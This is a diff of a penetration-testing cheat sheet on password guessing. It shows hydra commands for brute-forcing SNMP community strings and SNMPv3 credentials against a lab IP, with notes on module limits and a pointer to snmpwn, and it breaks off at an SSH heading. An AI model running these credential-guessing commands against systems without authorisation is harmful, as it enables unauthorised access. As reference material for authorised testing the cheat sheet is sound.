0liverFlow/Cheatsheets/password-guessing.md

 ### SNMP
 ```
 hydra -P '<snmp-community-strings.txt>' 10.10.10.10 snmp
 ```
 >  The command above will not work for SNMPv3 because SNMPv3 uses username and password for authentication, unlike SNMPv1 and SNMPv2 which rely on community strings.
-Refer to this command for `SNMPv3` :
+Refer to this command if you want to use `SNMPv3` :
-#### SNMPv3 dictionary attack
+#### SNMPv3
 ```
 hydra -l '<user>' -P '<passwords.txt>' -m:3:MD5 10.10.10.10 snmp
 ```
 > 1. The command above will perform a dictionary attack using the `AuthNoPriv` security level.
-The SNMPv3 module only support authentication (md5/sha) so far, not yet encryption.
+Hydra SNMPv3 module doesn't support encryption.
 For more information, run `hydra snmp -U`
-> 2. Furthermore, note that the SNMPv3 module is still in beta state in hydra.
+> 2. Furthermore, note that SNMPv3 module is still in beta state in hydra.
 Hence, it may not work properly.
 A better alternative will be `[snmpwn](https://github.com/hatlord/snmpwn)`

 ### SSH
 ```